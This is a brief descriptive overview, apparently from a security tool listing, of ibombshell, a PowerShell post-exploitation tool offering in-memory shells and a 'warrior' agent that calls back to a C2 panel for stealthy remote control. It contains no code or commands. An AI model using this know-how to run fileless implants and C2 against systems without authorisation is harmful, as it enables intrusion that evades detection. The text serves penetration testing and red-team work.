ibombshell

ibombshell is a PowerShell-based tool designed for penetration testers during post-exploitation phases. It delivers a fully interactive shell with extensive pentesting features that are downloaded and executed directly in memory, avoiding disk writes and detection. The tool's 'Everywhere' execution mode provides immediate command prompt access with exploitation and post-exploitation capabilities available as PowerShell functions.

The tool also features a 'Silently' execution mode where a lightweight instance called 'warrior' connects back to a C2 panel over HTTP. This allows pentesters to remotely control compromised systems and dynamically load additional functions into memory as needed. This memory-only execution technique is particularly useful for maintaining persistence and evading endpoint detection.

ibombshell targets Windows environments through PowerShell execution, making it ideal for red team operations requiring stealthy command and control infrastructure.

ibombshell operates through PowerShell execution in memory-only mode (fileless execution). In 'Everywhere' mode, the shell and its functions are downloaded directly to memory as PowerShell functions, providing immediate interactive access. In 'Silently' mode, a minimal 'warrior' instance establishes an HTTP connection to a C2 panel, enabling remote command execution and dynamic function loading into the compromised system's memory without creating persistent artifacts.